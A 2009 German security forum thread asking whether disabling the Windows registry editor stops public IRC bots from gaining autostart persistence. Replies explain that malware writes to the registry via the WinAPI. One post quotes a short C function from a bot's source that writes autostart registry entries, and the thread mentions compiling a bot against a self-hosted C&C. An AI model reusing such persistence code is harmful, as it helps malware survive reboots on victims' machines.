Hackerboard Wiki HaboBlog
Hackerboard bei Facebook Hackerboard bei Google+ Hackerboard bei Twitter

[HaBo]

 
Windows Dieses Forum dient den Diskussionen rund um alle Microsoft-Betriebssysteme.

Regedit Deaktivieren

Diskussion: Regedit Deaktivieren im Forum Windows, in der Kategorie Operating Systems; Anzeige Ich habe mal eine kleine frage zur regedit. Und zwar im XPAnti-Spy kann man die Regedit deaktivieren nun dachte ...

Antwort
Alt 24.06.09, 16:12   #1 (permalink)
 
Registriert seit: 05.02.08
zerohaxxor Leistung: Facit NTK
Likes: 0
Standard Regedit Deaktivieren

Anzeige

Ich habe mal eine kleine frage zur regedit.
Und zwar im XPAnti-Spy kann man die Regedit deaktivieren nun dachte ich mir,die meiste Malware die Public ist wie SDbot,Rbot oder RXbot usw starten alle über die regedit.

Nun kann der Bot auch in die regedit schreiben wen diese deaktiviert wurde ?
Wen er das nicht kann ist dies eine möglichkeit um sich Public Malware soweit es geht vom Hals zu halten,dann kommt die Malware beim nächsten Reboot nicht wider.

zerohaxxor ist offline   Mit Zitat antworten
Alt 24.06.09, 16:17   #2 (permalink)
Moderator
 
Benutzerbild von xeno
 
Registriert seit: 09.09.04
xeno Leistung: Pentium Ixeno Leistung: Pentium I
xeno eine Nachricht über ICQ schicken
Likes: 76
Standard

die registry kann man nicht mal eben 'deaktivieren', da sie ein wesentlicher bestandteil von windows ist. gibt es zu der funktion keine dokumentation? was ich mir nämlich vorstellen kann, ist, daß damit der zugriff auf die registry für bestimmte prozesse unterbunden wird, oder einfach der registryeditor 'regedit' nichtmehr aufrufbar ist.

also:
registry = konfigurationsdatenbank von windows
regedit = editor für selbige

schau da mal etwas genauer hin, vielleicht klärt sich dann schon alles auf.
xeno ist offline   Mit Zitat antworten
   
HaBOT
 
- Anzeige -

Werbung ist gerade online    
Alt 24.06.09, 16:34   #3 (permalink)
 
Registriert seit: 14.06.07
Machine Leistung: Facit NTK
Machine eine Nachricht über ICQ schicken
Likes: 0
Standard

Malware benutzt nicht den für den Benutzer gedachte Editor ("regedit") um etwas in die Registry zu schreiben.
Dafür gibt es Funktionen in der Winapi, die das erledigen. Darum wird es auch nix bringen regedit zu deaktivieren...

also: xeno hat recht^^
Machine ist offline   Mit Zitat antworten
Alt 24.06.09, 16:42   #4 (permalink)
.doc
Guest
 
Likes:
Standard

Ich habe eine bessere Idee: Warum meldest du dich nicht als einfacher User am System an und nicht als Administrator? Als User darfst du nicht in die Registry schreiben.
  Mit Zitat antworten
Alt 24.06.09, 19:10   #5 (permalink)
Themenstarter
 
Registriert seit: 05.02.08
zerohaxxor Leistung: Facit NTK
Likes: 0
Standard

Ok der XPAnti-Spy macht nix anderes als zu verhindern das der Angemeldete User an der regedit spielt.

Ich dachte es wäre so möglich das Programme keine einträge schreiben können,also sowas wie ein schreibschutzt für die regedit.

@Machine viele Public Malware nutzt die regedit um beim Restart des Systems mit gestartet zu werden.

Ein Beispiel dafür ist der NZM Bot und das ist nur einer von vielen,ich habe mal ein paar Bot Sources Compiled und viele starten über die regedit.Wen man sie aus der msconfig abschaltet startet der ganze Bot beim Reboot nicht mehr.

Ist zwar uralt diese Methode aber noch immer sehr weit verbreitet wen man sich so manche Sources anschaut.
zerohaxxor ist offline   Mit Zitat antworten
Alt 24.06.09, 20:31   #6 (permalink)
.doc
Guest
 
Likes:
Standard

Zitat:
gpedit.msc → Benutzerkonfiguration → Administrative Vorlagen → System → Zugriff auf Programme zum Bearbeiten der Registrierung verhindern
siehe Beitrag von Matthias Reitinger in http://www.tutorials.de/forum/micros...freigeben.html
  Mit Zitat antworten
Alt 24.06.09, 22:53   #7 (permalink)
Themenstarter
 
Registriert seit: 05.02.08
zerohaxxor Leistung: Facit NTK
Likes: 0
Standard

Ich habe es gerade in der VMware getestet mit dem H-Bot NZM Mod und er kann nicht ausgeführt werden ^^

so hat man einen Schutz gegen Public Bots die von den Kiddies verwendet werden und mit Cryptern FUD gemacht wurden.

zerohaxxor ist offline   Mit Zitat antworten
Alt 25.06.09, 02:11   #8 (permalink)
.doc
Guest
 
Likes:
Standard

Zitat:
Original von zerohaxxor
Ich habe es gerade in der VMware getestet mit dem H-Bot NZM Mod und er kann nicht ausgeführt werden ^^
Wir brauchen hierbei wohl eher einen Schutz gegen die eigene Naivität, als eine weitere technische Einschränkung. Wer mit Administrationsrechten einfache Arbeiten und tägliche Aufgaben (Office, Internet, ...) ausführt muss sich seiner Situation bewusst sein. Da reicht es bei weitem nicht, nur die Ausführungsrechte für regedit.exe zu setzen...
  Mit Zitat antworten
Alt 25.06.09, 09:37   #9 (permalink)
Themenstarter
 
Registriert seit: 05.02.08
zerohaxxor Leistung: Facit NTK
Likes: 0
Standard

Erkläre mir mal warum das nciht ausreichen sollte als zusätzlicher schutz ?

Der Bot den ich Kompilliert habe wie oben im Screen Trägt sich in der Regedit im Autostart ein damit er beim nächsten Systemstart gestartet wird.

Nun habe ich die Regedit Deaktiviert und der Bot konnte sich nicht eintragen und der Bot konnte nach einem neustart keine Verbindung zum C&C aufnehmen.Ich habe für diesen Test einen eigenen C&C eingerichtet mit dem der Bot Komunizierte.

Nach meinem Fazit:Es bringt etwas.
zerohaxxor ist offline   Mit Zitat antworten
Alt 25.06.09, 10:22   #10 (permalink)
sw33tlull4by
Guest
 
Likes:
Standard

Wenn du Regedit in den Autostart schreibst, dann wird auch Regedit gestartet und nicht der Bot.

Du vergisst das es immer 2 Schnittstellen bei einem Betriebssystem gibt.
Die die der user benutzt, sprich regedit und diejenigen welche von Programmen benutzt werden, die sg API.
Regedit benutzt zwar auch die API aber die API kann auch von anderen Programmen verwendet werden und da kannst du dann nicht mal eben mit dem Rechtemanagment helfen.

//edit
Ich rede hierbei nicht von einem systemcall in deinem Programm, sondern davon die API direkt durch das Programmbenutzen zu lassen.
  Mit Zitat antworten
Alt 25.06.09, 10:34   #11 (permalink)
 
Registriert seit: 14.06.07
Machine Leistung: Facit NTK
Machine eine Nachricht über ICQ schicken
Likes: 0
Standard

zerohaxxor, wenn ich mir deine beiträge so durchlese, dann hast du immernoch nicht begriffen, dass regedit und registry zwei unterschiedliche dinge sind.

der bot schreibt sich in die registry unter autostart ein. klar. das hat aber mit dem editor, regedit, welcher für den benutzer der vor dem pc sitzt gemacht ist, nichts zu tun.

du sagst, du hast den bot kompiliert? dann müsstest du ja auch in den source schauen können.. schau doch mal rein, wie implementiert ist, dass der regetry gesetzt wird...
oder sag mir, wo ich den source finde, dann seh ich rein
Machine ist offline   Mit Zitat antworten
Alt 25.06.09, 10:39   #12 (permalink)
Moderator
 
Benutzerbild von lightsaver
 
Registriert seit: 19.06.06
lightsaver Leistung: Pentium Ilightsaver Leistung: Pentium Ilightsaver Leistung: Pentium I
Likes: 52
Standard

Zitat:
Original von Machine
oder sag mir, wo ich den source finde, dann seh ich rein
Nur schonmal als Hinweis vorweg, entsprechende Links werden hier nicht toleriert!
lightsaver ist offline   Mit Zitat antworten
Alt 25.06.09, 10:42   #13 (permalink)
 
Registriert seit: 14.06.07
Machine Leistung: Facit NTK
Machine eine Nachricht über ICQ schicken
Likes: 0
Standard

jo, schon klar.. sorry, habs vergessen zu sagen: wenn, dann bitte per pm den link zum source...
ich will nur interessahalber mal reinsehen wie sich das teil nun wirklich in die registry schreibt. kann mir echt nicht vorstellen, dass das irgendwie über regedit gelöst sein soll
Machine ist offline   Mit Zitat antworten
Alt 25.06.09, 12:04   #14 (permalink)
Themenstarter
 
Registriert seit: 05.02.08
zerohaxxor Leistung: Facit NTK
Likes: 0
Standard

ich habe dir den Source per Pm gesendet und noch einmal eine beschreibung dafür gegeben wie ich den test gemacht habe.
zerohaxxor ist offline   Mit Zitat antworten
Alt 25.06.09, 12:08   #15 (permalink)
 
Registriert seit: 14.06.07
Machine Leistung: Facit NTK
Machine eine Nachricht über ICQ schicken
Likes: 0
Standard

Die "Beschriftung" kannst du ruhig allen geben ich will nur mal in den Source schauen...

Hier für alle seine PM:

Zitat:
Hier schicke ich dir den Source per PM da Links ja nciht erlaubt sind.

*eigentlich der Link*
Password: ******

Ich habe einen eigenen IRC eingerichtet mit UNrealIRCD dann habe ich den bot einmal in den IRC Joinen lassen befor ich die regedit deaktiviert habe,danach habe ich den boot aus dem System entfernt und die regedit Deaktiviert und dann den Bot neu Installiert,bei der Install des Bots kommt die meldung wie auf dem Screen und beim Neustart des Systen konnte der bot nicht mehr in den IRC joinen um Befehle entgegen zu nehmen.
EDIT: hab ja ganz und gar mein VPN nach hause vergessen hab grad mal in den Source geschaut.. da wird eindeutig, wie ich es vorher auch schon vermutet habe, die Winapi benutzt um in die Registry zu schreiben. Hat also nix mit Registry-Editor zu tun:

Code:
void AutoStartRegs(char *nfilename)
{
	HKEY key;

	for (int i=0; i < (sizeof(autostart) / sizeof(AUTOSTART)); i++) {
		fRegCreateKeyEx(autostart[i].hkey, autostart[i].subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
		if (nfilename)
			fRegSetValueEx(key, valuename, 0, REG_SZ, (const unsigned char *)nfilename, strlen(nfilename));
		else
			fRegDeleteValue(key, valuename);
		fRegCloseKey(key);
	}

	return;
}
Du kannst also den Editor an sich deaktivieren, der Zugriff bleibt auf die Registry erhalten...
Machine ist offline   Mit Zitat antworten
Antwort
   
- Anzeige -

Werbung ist gerade online    

[HaBo] » Operating Systems » Windows » Regedit Deaktivieren
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind aus
Pingbacks sind aus
Refbacks sind aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
batch RegEdit DarksideAMD Windows 3 06.12.06 15:28
Was kann man mit Regedit machen? aaaa Windows 11 16.07.06 12:52
Regedit deaktiviert dabind Windows 8 12.06.06 18:31
Regedit reinigen Hirnbreaker Windows 6 08.05.05 19:27
Regedit exportieren sfil Code Kitchen 3 25.04.04 18:53


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61